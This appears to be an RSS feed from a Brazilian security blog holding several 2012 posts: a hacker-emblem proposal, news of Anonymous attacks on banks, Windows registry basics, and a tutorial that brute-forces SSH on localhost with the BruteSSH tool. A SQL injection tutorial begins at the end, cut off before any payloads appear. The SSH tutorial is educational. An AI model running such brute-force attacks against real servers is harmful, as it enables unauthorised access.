<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>INW-Segurança</title>
	<atom:link href="http://www.inw-seguranca.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.inw-seguranca.com</link>
	<description>Sua Participação nos Faz os Melhores</description>
	<lastBuildDate>Wed, 22 Feb 2012 14:09:02 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
		<item>
		<title>O Glider: Proposta para um Emblema Hacker</title>
		<link>http://www.inw-seguranca.com/2012/02/22/o-glider-proposta-para-um-emblema-hacker/</link>
		<comments>http://www.inw-seguranca.com/2012/02/22/o-glider-proposta-para-um-emblema-hacker/#comments</comments>
		<pubDate>Wed, 22 Feb 2012 14:09:02 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3188</guid>
		<description><![CDATA[Olá amigos, Venho me desculpar por não ter postado nada novo nesse período de tempo. A justificativa é que eu estava viajando. Mas agora estou de volta e peço que continuem acompanhando o INW. Confiram agora essa ótima materia sobre o Glider do nosso amigo Bhior. Linux possui seu pinguim e os BSD&#8217;s seu daemon.]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><div>Olá amigos,</div>
<div>Venho me desculpar por não ter postado nada novo nesse período de tempo.</div>
<div>A justificativa é que eu estava viajando.</div>
<div>Mas agora estou de volta e peço que continuem acompanhando o INW.</div>
<div>Confiram agora essa ótima materia sobre o Glider do nosso amigo Bhior.</div>
<div><span id="more-3188"></span></div>
<div><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/hacker-emblem/"  class="http external blank"  rel="nofollow" target="_blank"><img class="aligncenter" src="http://www.checkup.med.br/historico/manter/emblema/hacker_arquivos/glider_002.png" alt="" border="0" /></a></div>
<p>Linux possui seu <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.isc.tamu.edu/%7Elewing/linux/"  class="http external blank"  rel="nofollow" target="_blank">pinguim</a> e os BSD&#8217;s seu <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.mckusick.com/beastie/"  class="http external blank"  rel="nofollow" target="_blank">daemon</a>. Perl possui um <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.perl.org/camel.html"  class="http html external blank"  rel="nofollow" target="_blank">camelo</a>, os fans da FSF tem seu <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.fsf.org/graphics/gnu-head-sm.jpg"  class="http jpg external blank"  rel="nofollow" target="_blank">gnu</a> e a OSI possui o <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://opensource.org/trademarks/opensource/web/opensource-110x95.png"  class="http png external blank"  rel="nofollow" target="_blank"> logo do open source</a>. O que nós não temos, historicamente, é um emblema que represente <em>toda</em> a comunidade hacker dos quais esses grupos fazem parte. Esta é uma proposta para que adotemos um — o padrão glider do Jogo da Vida.<br />
Essa idéia foi alpha-testada entre aproximadamente metade dos hackers e eles instantaneamente disseram &#8220;Wow! Legal!&#8221; sem precisarem de mais nenhuma explicação. Se você não sabe o que um glider é, ou porque ele poderia tornar-se um bom emblema, ou se você somente tem dúvidas sobre ter um emblema, leia a página de <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.checkup.med.br/historico/manter/emblema/faqs.html"  class="http html external blank"  rel="nofollow" target="_blank">FAQ</a>.<br />
A primeira vez que propuz esse emblema foi em Outubro de 2003. Desde então ele entrou em grande uso e se espalhou, como você pode ver pelo número de tranduções internacionais na esquerda. Não universalmente, porque muitos hackers <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.jelb.org.br/%7Efilipe/faqs.html#why"  class="http external blank"  rel="nofollow" target="_blank"> não concordam a príncipio</a> com a idéia de ter um emblema, mas parece ser um símbolo de sucesso.</p>
<p><strong>O que estarei dizendo se exibí-lo?</strong></p>
<p>Quando você coloca o emblema glider na sua web page, ou usa ele em alguma roupa, ou exibe ele de alguma outra maneira, você está visivelmente associando-se com a cultura hacker. Isso não é exatamente a mesma coisa que reivindicar que você é um hacker — isso é um título de honra que geralmente deve ser <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/jargon/html/H/hacker.html"  class="http html external blank"  rel="nofollow" target="_blank">conferido pelos outros</a> ao invés de ser auto-assumido. Mas ao usar esse emblema, você expressa sua simpatia com os objetivos , valores e maneiras de viver dos hackers. Veja o <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.checkup.med.br/historico/manter/emblema/faqs.html"  class="http html external blank"  rel="nofollow" target="_blank">FAQ</a> para uma discussão mais aprofundada.<br />
Sim, após apenas 4 dias que esta proposta foi lançada, haviam <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.cafepress.com/esr_glider"  class="http external blank"  rel="nofollow" target="_blank">canecas e camisetas</a>. Por favor, observe que eu não tenho nada a ver com isso e eu não estou recebendo nada; de fato, os rendimentos estão indo para a Electronic Frontier Foundation. Agora existe uma <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://store.yahoo.net/anrovia/hacker.html"  class="http html external blank"  rel="nofollow" target="_blank">segunda fonte</a> com designs diferentes.</p>
<p><strong>Quem <em>não</em> deve usar este emblema?</strong></p>
<p>Se você invade computadores de outras pessoas, aqueles de nós que inventaram o emblema não querem que você o exiba. Vá inventar o seu próprio emblema. Nós descobriremos alguma maneira de envergonhar e rejeitar sua publicidade se você sujar a nossa.<br />
Eu costumava ter uma proibição contra uso comercial aqui. Um número de pessoas argumentou convincentemente que isso não era prático e talvez inusto. Mas mantenha o bom gosto, ou você será flamed.</p>
<p><strong>Como posso usá-lo?</strong></p>
<p>O glider não possui copyright ou trademark. A maneira recomendada para usá-lo é em uma página, com uma imagem e um link para essa página ou diretamente para <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/faqs/hacker-howto.html"  class="http html external blank"  rel="nofollow" target="_blank">How To Become A Hacker</a>. Segue aqui um pedaço de código XHTML que você pode colar em uma página.</p>
<p>&lt;a href=&#8217;http://www.catb.org/hacker-emblem/&#8217;&gt; &lt;img src=&#8217;http://www.catb.org/hacker-emblem/glider.png&#8217; alt=&#8217;hacker emblem&#8217; /&gt;&lt;/a&gt; Aqui está como ele irá aparecer:</p>
<div><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/hacker-emblem/"  class="http external blank"  rel="nofollow" target="_blank"> <img class="aligncenter" src="http://www.checkup.med.br/historico/manter/emblema/hacker_arquivos/glider.png" alt="" border="0" /></a></div>
<p>Sinta-se livre para aumentar ou diminuir a imagem. Esse arquivo PNG foi gerado a partir de um <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/hacker-emblem/glider.pic"  class="http pic external blank"  rel="nofollow" target="_blank"> fonte PIC</a> e então reduzido pela metade. Você também pode baixar uma versão <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/hacker-emblem/glider.svg"  class="http svg external blank"  rel="nofollow" target="_blank">SVG</a> , uma <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.hackcraft.net/favicon.ico"  class="http ico external blank"  rel="nofollow" target="_blank">.ico</a>, uma <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/hacker-emblem/glider.eps"  class="http eps external blank"  rel="nofollow" target="_blank">versão PostScript encapsulada</a>, ou até o código <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/hacker-emblem/glider.tex"  class="http tex external blank"  rel="nofollow" target="_blank">TEX</a> .</p>
<p><strong>Variações:</strong></p>
<p>Antes de criar sua própria variação, por favor leia o <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.checkup.med.br/historico/manter/emblema/faqs.html"  class="http html external blank"  rel="nofollow" target="_blank">FAQ</a>. Aqui estão algumas variações que recebi:</p>
<div style="text-align: center;"><img src="http://www.checkup.med.br/historico/manter/emblema/hacker_arquivos/hacker.png" alt="" border="0" /> <img src="http://www.checkup.med.br/historico/manter/emblema/hacker_arquivos/glider-small.png" alt="" border="0" /><br />
.O. ..O OOO<br />
|_|0|_| |_|_|0| |0|0|0|</div>
<p>Aqui está um <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/hacker-emblem/glider-theme.tar.gz"  class="http gz external blank"  rel="nofollow" target="_blank">karamba theme</a> para exibir o emblema glider em um desktop KDE.<br />
Aqui existe um versão no formato <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/hacker-emblem/glider.ico"  class="http ico external blank"  rel="nofollow" target="_blank">ico</a> , e aqui <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.hackcraft.net/favicon.ico"  class="http ico external blank"  rel="nofollow" target="_blank">outra</a>. Se você nomear alguma dessas imagens de favicon.ico e colocá-la no diretório raiz de seu site, ela irá se tornar o ícone do seu site.<br />
Esta <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.catb.org/%7Eesr/hacker-emblem/tattoo.jpg"  class="http jpg external blank"  rel="nofollow" target="_blank">tatuagem</a> é impressinante, mas parece um pouco excessivo.</p>
<p>Ref: <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://remote-execution.blogspot.com/2012/02/o-glider-proposta-para-um-emblema.html"  class="http html external blank"  rel="nofollow" target="_blank">http://remote-execution.blogspot.com&#8230;m-emblema.html</a></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/02/22/o-glider-proposta-para-um-emblema-hacker/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ataque SSH por Bruteforce com BruteSSH</title>
		<link>http://www.inw-seguranca.com/2012/02/10/ataque-ssh-por-bruteforce-com-brutessh/</link>
		<comments>http://www.inw-seguranca.com/2012/02/10/ataque-ssh-por-bruteforce-com-brutessh/#comments</comments>
		<pubDate>Fri, 10 Feb 2012 15:19:31 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Pen-Test]]></category>
		<category><![CDATA[BruteSSH]]></category>
		<category><![CDATA[SSH]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3183</guid>
		<description><![CDATA[Introdução BruteSSH é um script feito em python que é capaz de fazer brute-force no serviço SSH. Para uma simples demo, irei realizar o ataque em minha própria máquina (127.0.0.1) Instalando o BruteSSH Abra o terminal e faça o download do arquivo pelo comandos a seguir: root@bt:~# wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2 Agora vamos decompactar o arquivo: root@bt:~#]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p><strong>Introdução</strong><br />
BruteSSH é um script feito em python que é capaz de fazer brute-force no serviço SSH. Para uma simples demo, irei realizar o ataque em minha própria máquina (127.0.0.1)</p>
<p><strong>Instalando o BruteSSH<br />
</strong>Abra o terminal e faça o download do arquivo pelo comandos a seguir:</p>
<p><span id="more-3183"></span></p>
<div>
<pre class="brush: xml; title: ;">
root@bt:~# wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2
</pre>
<p>Agora vamos decompactar o arquivo:</p>
<div>
<pre class="brush: xml; title: ;">
root@bt:~# tar -jxvf brutessh-0.5.tar.bz2
</pre>
<p>Depois basta entrar no diretório</p>
<div>
<pre class="brush: xml; title: ;">
root@bt:~# cd brutessh
root@bt:~/brutessh#
</pre>
<p>Agora é só rodar o script feito em python (py):</p>
<div>
<pre class="brush: xml; title: ;">
root@bt:~/brutessh# python brutessh.py
</pre>
<p><img src="http://3.bp.blogspot.com/-kC4P-Fj8T3Q/Tyg-6DZGvXI/AAAAAAAAAso/0XW9NYh9aLU/s1600/01.png" alt="" border="0" />Se você observar, os parâmetros são bem simples. Vamos lá mostrar alguns.</p>
<div>
<pre class="brush: xml; title: ;">
-h: Host destino
-u: Usuário
-d: Arquivo de senha
</pre>
<p>Ps: Criei um script capaz de instalar o BruteSSH automaticamente.</p>
<div>
<pre class="brush: xml; title: ;">
#!/bin/bash
# Por Jarlley Ribeiro - 0fx66

clear
echo &quot;  [        Brute install                  ]&quot;
echo &quot;  [       0fx66 - www.0fx66.blogspot.com  ]&quot;
echo &quot;&quot;
echo &quot; [*]  Downloadind BruteSSH. Please Wait...&quot;
wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout
echo &quot; [*]  Unpacking Brutessh. Please Wait...&quot;
tar -jxvf brutessh-0.5.tar.bz2 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout
echo &quot; [*]  OK!&quot;
echo &quot; [*]  To run, use: python brutessh.py&quot;
echo &quot;  Exiting..&quot;
</pre>
<p>Agora basta você da as permissões necessárias (x = execução) para executar o script.</p>
<div>
<pre class="brush: xml; title: ;">
root@bt:~/aaa# chmod +x brutessh_Install.sh
</pre>
<p><strong>Ataque!<br />
</strong>Uso o serviço SSH do BackTrack com login e senha padrão (root e toor), então vou criar uma pequena world list com a senha correspondente.<img src="http://1.bp.blogspot.com/-yTJQASVo_DI/Tyg_1ZXorTI/AAAAAAAAAsw/AYylb08uMZ0/s1600/02.png" alt="" border="0" /></p>
<p>Agora vamos disparar o ataque usando a seguinte sintaxe:</p>
<div>
<pre class="brush: xml; title: ;">
root@bt:~/brutessh# python brutessh.py -h 127.0.0.1 -u root -d password
</pre>
<p>Onde os parâmetros foram explicados acima. O resultado foi:<img src="http://3.bp.blogspot.com/-I1H1X346B6U/TyhAwVq7-YI/AAAAAAAAAs4/PuyZm1iUjCM/s1600/03.png" alt="" border="0" /></p>
<p>No campo &#8220;Password Found&#8221;, ele exibe a senha quebrada (toor).</p>
<p><strong>Finalizando<br />
</strong>Com uma ótima word list e paciência, você pode rapidamente conseguir acesso ao sistema por ssh, para se proteger, evite usar senhas de fáceis caracteres (toor, 123, 321) e mude sua senha regulamente.</p>
<p>Autor: <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://0fx66.blogspot.com/2012/01/ataque-ssh-por-bruteforce-com-brutessh.html"  class="http html external blank"  rel="nofollow" target="_blank">0fx66</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/02/10/ataque-ssh-por-bruteforce-com-brutessh/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tango Down! Site do HSBC foi derrubado pelo Anonymous</title>
		<link>http://www.inw-seguranca.com/2012/02/02/tango-down-site-do-hsbc-foi-derrubado-pelo-anonymous/</link>
		<comments>http://www.inw-seguranca.com/2012/02/02/tango-down-site-do-hsbc-foi-derrubado-pelo-anonymous/#comments</comments>
		<pubDate>Thu, 02 Feb 2012 15:42:51 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[Anonymous]]></category>
		<category><![CDATA[derruba]]></category>
		<category><![CDATA[HSBC]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3176</guid>
		<description><![CDATA[Vários sites de instituições bancárias foram derrubados pelo Anonymous nos últimos dias. E depois do Bradesco e do Banco do Brasil, hoje foi a vez de o HSBC ser atacado pelo grupo de hackers. Os objetivos do ataque já haviam sido divulgados em entrevista concedida ao Tecmundo. Como os próprios integrantes afirmaram: atacando sites de]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Vários sites de instituições bancárias foram derrubados pelo Anonymous nos últimos dias. E depois do Bradesco e do Banco do Brasil, hoje foi a vez de o HSBC ser atacado pelo grupo de hackers. Os objetivos do ataque já haviam sido divulgados em entrevista concedida ao Tecmundo.</p>
<p><span id="more-3176"></span></p>
<p>Como os próprios integrantes afirmaram: atacando sites de bancos, o Anonymous afeta muito mais pessoas, o que pode ser muito bom para chamar a atenção para a causa deles. O Tecmundo constatou a instabilidade nos servidores do HSBC, que até o fechamento desta notícia (11:05 da manhã; 2 de fevereiro) não podia ser acessado.</p>
<p>Fonte: <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.tecmundo.com.br/ataque-hacker/18841-tango-down-site-do-hsbc-foi-derrubado-pelo-anonymous.htm#ixzz1lEpGCsCk"  class="http external self" >http://www.tecmundo.com.br/ataque-hacker/18841-tango-down-site-do-hsbc-foi-derrubado-pelo-anonymous.htm#ixzz1lEpGCsCk</a></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/02/02/tango-down-site-do-hsbc-foi-derrubado-pelo-anonymous/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial: Noções do REGEDIT (Registro) PARTE 3.</title>
		<link>http://www.inw-seguranca.com/2012/01/31/tutorial-nocoes-do-regedit-registro-parte-3/</link>
		<comments>http://www.inw-seguranca.com/2012/01/31/tutorial-nocoes-do-regedit-registro-parte-3/#comments</comments>
		<pubDate>Tue, 31 Jan 2012 20:56:25 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Windows]]></category>
		<category><![CDATA[REGEDIT]]></category>
		<category><![CDATA[registro]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3173</guid>
		<description><![CDATA[Olá pessoal, continuando o tutorial aqui sobre REGEDIT agora com a parte 3. Um pouco de história. Regedit é um programa que você pode usar para acessar e editar o Registro no Microsoft Windows. O registro pode ser editado manualmente pelo regedit.exe execução. Você pode mesmo usar regedt32.exe. Ele normalmente vem com a instalação padrão]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Olá pessoal, continuando o tutorial aqui sobre REGEDIT agora com a parte 3.</p>
<p>Um pouco de história.</p>
<p><span id="more-3173"></span></p>
<p>Regedit é um programa que você pode usar para acessar e editar o Registro no Microsoft Windows. O registro pode ser editado manualmente pelo regedit.exe execução. Você pode mesmo usar regedt32.exe. Ele normalmente vem com a instalação padrão do Windows.</p>
<p>Ele pode ser iniciado a partir do Run (Iniciar&gt;&gt;&gt; Executar), Editar o Registro deve ser feito com cuidado, e com a compreensão, tanto quanto possível a respeito de porque e onde você está fazendo uma mudança. Edição do Registro descuidado pode causar danos irreversíveis. É altamente recomendável que você faça backup do Registro antes de fazer quaisquer alterações.</p>
<p>Uma ferramenta simples regedit apareceu em Windows 3.x, o chamado &#8220;Editor de Registro Info&#8221; ou &#8220;Editor de Registro&#8221; Regedt32.exe. Este foi apenas um banco de dados de aplicações utilizadas para editar objetos OLE incorporados em documentos. Com o Windows 9x REGEDIT.EXE sistemas operacionais foi incluído. Windows NT introduziu permissões para edição do Registro. Windows NT 4.0 e Windows 2000 continha tanto o Windows 9x e REGEDIT.EXE s Windows NT 3.x &#8220;.</p>
<p>Windows XP foi o primeiro sistema a integrar estes dois programas em um só. Regedit32 apenas executa o REGEDIT no XP.</p>
<p>Noções do REGEDIT parte 1: <a href="http://www.inw-seguranca.com/2012/01/15/tutorial-nocoes-de-regedit-parte-1/"  class="http internal self" >http://www.inw-seguranca.com/2012/01/15/tutorial-nocoes-de-regedit-parte-1/</a></p>
<p>Noçoes do REGEDIT parte 2: <a href="http://www.inw-seguranca.com/2012/01/25/tutorial-nocoes-do-regedit-registro-parte-2/"  class="http internal self" >http://www.inw-seguranca.com/2012/01/25/tutorial-nocoes-do-regedit-registro-parte-2/</a></p>
<p>Continuando na próxima parte.</p>
<p><strong>Autor: WCG 147</strong></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/01/31/tutorial-nocoes-do-regedit-registro-parte-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Anonymous Anuncia Ataque a Bancos no Brasil</title>
		<link>http://www.inw-seguranca.com/2012/01/30/anonymous-anuncia-ataque-a-bancos-no-brasil/</link>
		<comments>http://www.inw-seguranca.com/2012/01/30/anonymous-anuncia-ataque-a-bancos-no-brasil/#comments</comments>
		<pubDate>Mon, 30 Jan 2012 14:32:18 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[Anonymous]]></category>
		<category><![CDATA[ataque]]></category>
		<category><![CDATA[Brasil]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3169</guid>
		<description><![CDATA[Segundo o grupo, a operação contra os bancos se dará ao longo de toda esta semana e receberá o nome de #OpWeeksPayment São Paulo – O grupo hacker Anonymous divulgou nessa segunda-feira que dará início a uma série de ataques contra páginas online das principais instituições financeiras do Brasil. Segundo o grupo, a operação contra]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Segundo o grupo, a operação contra os bancos se dará ao longo de toda esta semana e receberá o nome de #OpWeeksPayment<br />
<span id="more-3169"></span><br />
São Paulo – O grupo hacker Anonymous divulgou nessa segunda-feira que dará início a uma série de ataques contra páginas online das principais instituições financeiras do Brasil.<br />
Segundo o grupo, a operação contra os bancos se dará ao longo de toda esta semana e receberá o nome de #OpWeeksPayment. Cada dia da semana será destinado a um serviço de internet banking, que deverá ficar fora do ar por 12 horas.</p>
<p>O objetivo do grupo é alertar a população sobre a injustiça e a corrupção que predomina no Brasil. E esta semana foi escolhida por conter os principais dias para pagamento dos salários.</p>
<p>A Info registrou intermitência no acesso ao site do banco Itaú na manhã desta segunda-feira (30). Em contato com a assessoria de imprensa da instituição, até o fechamento desta matéria, ainda não recebemos uma posição oficial a respeito de eventuais ataques na página da empresa.</p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/01/30/anonymous-anuncia-ataque-a-bancos-no-brasil/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial: Noções do REGEDIT (Registro) PARTE 2.</title>
		<link>http://www.inw-seguranca.com/2012/01/25/tutorial-nocoes-do-regedit-registro-parte-2/</link>
		<comments>http://www.inw-seguranca.com/2012/01/25/tutorial-nocoes-do-regedit-registro-parte-2/#comments</comments>
		<pubDate>Wed, 25 Jan 2012 20:16:05 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Windows]]></category>
		<category><![CDATA[REGEDIT]]></category>
		<category><![CDATA[registro]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3161</guid>
		<description><![CDATA[Noções DO REGEDIT PARTE 2 Olá pessoal como disse na parte anterior de noções do REGEDIT, estou dando continuação com o tutorial com a PARTE 2. Valores de Registro. O registro é dividido em seções. Cada uma dessas seções é alguma coisa como uma pasta e contêm chaves e subchaves. Chaves thses pode conter outras]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><div id="post_message_76242">
<div id="HOTWordsTxt">
<p><span style="font-size: small;"><strong>Noções DO REGEDIT PARTE 2 </strong></span></p>
<p>Olá pessoal como disse na parte anterior de noções do REGEDIT, estou dando continuação com o tutorial com a PARTE 2.</p>
<p>Valores de Registro.</p>
<p>O registro é dividido em seções. Cada uma dessas seções é alguma coisa como uma pasta e contêm chaves e subchaves. Chaves thses pode conter outras sub-chaves ou valores Leia mais básico de REGEDIT parte 1. <a href="http://www.inw-seguranca.com/2012/01/15/tutorial-nocoes-de-regedit-parte-1/"  class="http internal blank"  target="_blank">Noções do REGEDIT PARTE 1</a></p>
<p><span id="more-3161"></span></p>
<p>Cada chave ou sub-chave também pode conter valores. Estes valores são, onde as informações sobre software, hardware, e os usuários são armazenados. Os valores são classificados em três tipos principais:<br />
• <strong>DWORD</strong> &#8211; É permitido para entradas Boolean onde a opção é uma lista de opções. as opções de decidir sobre a forma como o software funciona. REG_DWORD é normalmente utilizado para valores booleanos e é um número de quatro bytes. Muitos drivers de dispositivo e serviços usmr valores DWORD para alternar entre as opções. Como eles são boolean podem assumir apenas 0 ou 1.<br />
• <strong>BINARY</strong> &#8211; Eles são os mais hardware e configurações de dados do dispositivo em binário entrou em formato hexadecimal REG_BINARY é usado para armazenar informações como dados binários brutos, e normalmente é usado para componentes de hardware..<br />
• <strong><strong>STRING</strong></strong> &#8211; Eles são os humanos entradas de texto legível, como nome do software, data de instalação. O tipo String Value pode acomodar variáveis e vários valores. Os tipos de valor são denotados como:<br />
• <strong>REG_SZ</strong> string de dados é o padrão.<br />
• <strong>REG_EXPAND_SZ</strong> é uma seqüência de dados expansível. O valor destes pode ser substituída pela aplicação de chamada a chave. Esta é apenas em regedit32 e não no REGEDIT esperar em XP, onde ambos são iguais.<br />
• <strong><strong>REG_MULTI_SZ</strong></strong> é usado para armazenar vários valores. Cada entrada tem que ser separado por uma parte um carácter NULL também é apenas no regedit32 e não no REGEDIT esperar no XP.</p>
<p>Mais na próxima parte.</p>
<p><span style="font-size: large;">Autor: WCG 147</span></p>
</div>
</div>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/01/25/tutorial-nocoes-do-regedit-registro-parte-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8216;Havijando&#8217; sem havij: SQLi manual na prática</title>
		<link>http://www.inw-seguranca.com/2012/01/25/havijando-sem-havij-sqli-manual-na-pratica/</link>
		<comments>http://www.inw-seguranca.com/2012/01/25/havijando-sem-havij-sqli-manual-na-pratica/#comments</comments>
		<pubDate>Wed, 25 Jan 2012 20:07:30 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Pen-Test]]></category>
		<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3158</guid>
		<description><![CDATA[Antes de qualquer coisa, vamos definir aqui duas palavras que têm confundido muita gente: Deface: Ato ou efeito de desfigurar uma página Defacer: Aquele que pratica o deface. Ok, agora podemos continuar (eu acho que posso, já que estou navegando a 18 Kbps (isso mesmo, são kilobits, e não kilobytes) por conta da chuva). Há]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Antes de qualquer coisa, vamos definir aqui duas palavras que têm confundido muita gente:</p>
<p>Deface: Ato ou efeito de desfigurar uma página<br />
Defacer: Aquele que pratica o deface.</p>
<p>Ok, agora podemos continuar (eu acho que posso, já que estou navegando a 18 Kbps (isso mesmo, são kilobits, e não kilobytes) por conta da chuva).</p>
<p>Há um tempo eu havia postado um tutorial sobre o SQLi. Porém, foi muito baseado na teoria, e não na prática. Em todo caso, recomendo que, antes de prosseguir, você o leia também, bem como as sugestões dadas nele. Clique aqui.</p>
<p>Vamos esclarecer o principal defeito que houve em meu tutorial:<br />
